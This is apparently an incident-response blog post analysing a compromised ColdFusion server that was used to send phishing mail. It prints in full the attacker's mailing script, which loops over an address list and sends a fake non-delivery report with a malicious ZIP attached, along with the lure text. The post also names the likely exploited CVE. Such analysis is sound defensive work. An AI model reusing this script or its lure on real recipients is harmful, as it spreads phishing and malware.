I responded to an incident that was initiated by an abuse complaint from a European ISP. Their mail server was receiving a large amount of backscatter due to emails that were initially sent from a server that I came to inspect. The sending server was a Postfix server, and there were many undelivered emails in the queue, coming from an unfamiliar domain. After closer inspection of the queue and the Postfix logs, it was clear that the emails were originating from a web server on the local network.
The compromised web server was a Windows server running IIS and ColdFusion. The HTTP ports were publicly accessible. A brief search of the server revealed a few malicious CF files, including a large web shell, and a small mailing script. In the same directory was a newly uploaded text file, containing thousands of email addresses, and a ZIP archive containing a clearly malicious executable made to look like a text file. This piece of malware will be covered in another post.
The smaller CF mailing script contains the following code:
<cfsetting RequestTimeout ="600000"> <cfloop index="id" file="C:\inetpub\wwwroot\CFIDE\fc.txt" from="1" to="31429"> <cfset sleep(100)> <cfset msg = RandRange(185,750)> <cfset subj = RandRange(12,21)> <cfmail from="Mail Delivery System <email@example.com>" to="#id#" subject="Delivery Status Notification (Failure)"> <cfmailparam file="C:\inetpub\wwwroot\CFIDE\Incoming Email.zip"> Incoming email(s) for <#id#> could not be delivered due to a persistent data format error. The incoming email(s) can be read in the attachment <Incoming Email.zip> For security purposes it has been saved in a plain text readable binary document. Technical overview: >>> (after RCPT To): Status Code 550.. checking .. subject length #subj# chars, message length #msg# chars.. >>> ! Message cannot be represented in 8-Bit ASCII encoding ! Return error code 521 >>> Mail transaction failed... waiting for reply from server .. >>> Server reply: email successfully stored in plain text binary document <Incoming Email.zip> >>> Return failure notification with original email in attachment to recipient .. This is an automatically generated delivery status notification, please do not reply. </cfmail> <cfoutput>Mail sent to #id#<br></cfoutput> </cfloop>
This code references a text file, “fc.txt” full of thousands of email addresses, and a ZIP file, called “Incoming Email.zip”. This script creates plausible looking phishing email content, attaches the file, and then loops through the email addresses. The script uses the SMTP server associated with the server’s ColdFusion configuration.
I searched through the HTTP logs to identify how and when these malicious pages were created and accessed. Each of the pages had only been accessed a couple of times in the recent past. They were accessed from a single IP address, which, through a PTR record is self-identified as a Tor exit node. A continued search of the HTTP logs showed that the same IP had POSTed to the “/CFIDE/administrator” page before accessing these malicious files. It is possible that the site was compromised by exploiting a recent ColdFusion vulnerability identified by CVE-2013-0632. I don’t have the packet captures to confirm what exactly was POSTed to the server. However, this seems like the most likely explanation.
- This malware sample was distributed as an attachment to a phishing email.
- The phishing email is designed to look like a legitimate non-delivery report.
- The email was distributed through a short ColdFusion script that loops through a text file containing thousands of email addresses.
- The script, email list and ZIP file were uploaded to the server by exploiting ColdFusion vulnerability CVE-2013-0632.
- The exploit and execution of the mailing script originated from a Tor exit node, effectively anonymizing the attacker.
In the next part, I will inspect and analyze the malware payload contained within the attachment.
photo credit: Darwin Bell via photopin cc